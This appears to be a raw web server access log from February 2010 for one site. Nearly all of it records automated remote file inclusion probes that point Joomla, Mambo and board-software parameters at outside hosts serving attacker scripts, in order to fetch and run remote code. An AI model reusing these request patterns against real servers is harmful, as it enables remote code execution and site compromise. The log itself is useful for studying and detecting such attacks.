123.143.29.250 - - [10/Feb/2010:04:00:56 -0800] "GET /logs/access_100130.log%20%20//bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/2/10/2756455/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [10/Feb/2010:04:01:24 -0800] "GET /logs/access_100114.log/errors.php?error=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:01:27 -0800] "GET /logs/access_100125.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:01:27 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:01:27 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:01:46 -0800] "GET /logs/access_100118.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:01:59 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:01:59 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:01:59 -0800] "GET /logs/access_100125.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:02:26 -0800] "GET /logs/access_100203.log%20%20///bbs/write_update.php?board_skin_path=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:02:26 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:02:26 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:02:30 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:02:30 -0800] "GET /logs/access_100203.log%20%20///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:02:30 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:03:47 -0800] "GET /logs/access_100109.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.134.40.32 - - [10/Feb/2010:04:03:57 -0800] "GET /ideal/forum/ HTTP/1.0" 404 5258 "http://puaga.com/ideal/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "puaga.com"
188.134.40.32 - - [10/Feb/2010:04:03:58 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "puaga.com"
58.150.99.131 - - [10/Feb/2010:04:04:14 -0800] "GET /logs/access_100109.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.207.120.69 - - [10/Feb/2010:04:04:47 -0800] "GET /logs/access_100125.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
24.207.120.69 - - [10/Feb/2010:04:04:47 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
24.207.120.69 - - [10/Feb/2010:04:04:47 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:05:42 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:05:42 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:05:42 -0800] "GET /logs/access_100203.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:06:02 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:07:31 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:07:31 -0800] "GET /logs/access_100116.log//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:07:31 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:07:51 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:07:51 -0800] "GET /logs/access_100116.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:07:51 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:08:29 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:08:29 -0800] "GET /logs/access_100203.log%20%20//bbs//delete_all.php?board_skin_path=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:08:32 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:08:51 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:08:51 -0800] "GET /logs/access_100203.log%20%20//bbs//delete_all.php?board_skin_path=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:08:51 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:08:52 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:08:52 -0800] "GET /logs/access_100116.log//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:08:53 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:08:59 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:09:04 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:09:08 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:09:08 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:09:08 -0800] "GET /logs/access_100203.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:09:20 -0800] "GET /logs/access_100112.log//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:09:30 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.207.120.69 - - [10/Feb/2010:04:10:17 -0800] "GET /logs/access_100109.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:04:10:21 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:04:10:21 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:10:26 -0800] "GET /logs/access_100130.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:10:26 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:10:27 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:11:11 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:11:11 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:11:11 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:11:35 -0800] "GET /logs/access_100108.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:11:44 -0800] "GET /logs/access_100118.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:04:11:45 -0800] "GET /logs/access_100108.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:11:57 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:11:57 -0800] "GET /logs/access_100201.log//components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:11:57 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:11:57 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:11:57 -0800] "GET /logs/access_100201.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:11:57 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:13:27 -0800] "GET /logs/access_100201.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:04:13:56 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:04:13:56 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:04:13:56 -0800] "GET /logs/access_100201.log//components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:14:46 -0800] "GET /logs/access_100112.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:15:53 -0800] "GET /logs/access_100112.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:17:18 -0800] "GET /logs/access_100127.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:17:19 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:17:19 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:17:19 -0800] "GET /logs/access_100127.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:17:20 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:04:17:23 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:04:17:23 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:17:23 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:20:01 -0800] "GET /logs/access_100201.log//components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:04:20:04 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:04:20:04 -0800] "GET /logs/access_100105.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:04:20:04 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [10/Feb/2010:04:20:31 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [10/Feb/2010:04:20:31 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:20:52 -0800] "GET /logs/access_100112.log//components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [10/Feb/2010:04:21:15 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [10/Feb/2010:04:21:16 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:21:32 -0800] "GET /logs/access_100112.log//components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.96.161 - - [10/Feb/2010:04:21:33 -0800] "GET /admin/classes/errors.php?error=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.96.161 - - [10/Feb/2010:04:21:33 -0800] "GET /logs//admin/classes/errors.php?error=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.96.161 - - [10/Feb/2010:04:21:33 -0800] "GET /logs/access_100107.log%20%20//admin/classes/errors.php?error=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.96.161 - - [10/Feb/2010:04:22:01 -0800] "GET /logs/access_100122.log%20%20//admin/classes/errors.php?error=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:04:23:21 -0800] "GET /logs/access_100112.log//components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.101.2.63 - - [10/Feb/2010:04:24:38 -0800] "GET /logs/index.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.101.2.63 - - [10/Feb/2010:04:24:38 -0800] "GET /index.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:24:39 -0800] "GET /logs/index.php?sayfa=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:24:39 -0800] "GET /logs/access_100117.log%20%20/index.php?sayfa=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.101.2.63 - - [10/Feb/2010:04:24:39 -0800] "GET /logs/access_100117.log%20%20/index.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:24:39 -0800] "GET /index.php?sayfa=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:04:25:04 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:04:25:05 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:04:25:05 -0800] "GET /logs/access_100201.log//components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.101.2.63 - - [10/Feb/2010:04:25:12 -0800] "GET /index.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.101.2.63 - - [10/Feb/2010:04:25:12 -0800] "GET /logs/index.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.101.2.63 - - [10/Feb/2010:04:25:12 -0800] "GET /logs/access_100117.log%20%20/index.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:25:35 -0800] "GET /logs/access_100129.log%20%20/index.php?sayfa=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.101.2.63 - - [10/Feb/2010:04:27:36 -0800] "GET /logs/access_100129.log%20%20/index.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.101.2.63 - - [10/Feb/2010:04:27:40 -0800] "GET /logs/access_100129.log%20%20/index.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.96.161 - - [10/Feb/2010:04:28:11 -0800] "GET /logs/access_100107.log//admin/classes/errors.php?error=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.7.90 - - [10/Feb/2010:04:28:12 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
69.175.7.90 - - [10/Feb/2010:04:28:12 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
174.142.96.161 - - [10/Feb/2010:04:28:19 -0800] "GET /logs/access_100122.log//admin/classes/errors.php?error=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.7.90 - - [10/Feb/2010:04:28:19 -0800] "GET /logs/access_100114.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:04:29:06 -0800] "GET /logs/access_100112.log//components/com_forum/download.php?phpbb_root_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [10/Feb/2010:04:29:06 -0800] "GET /logs//bbs2//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [10/Feb/2010:04:29:06 -0800] "GET /bbs2//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
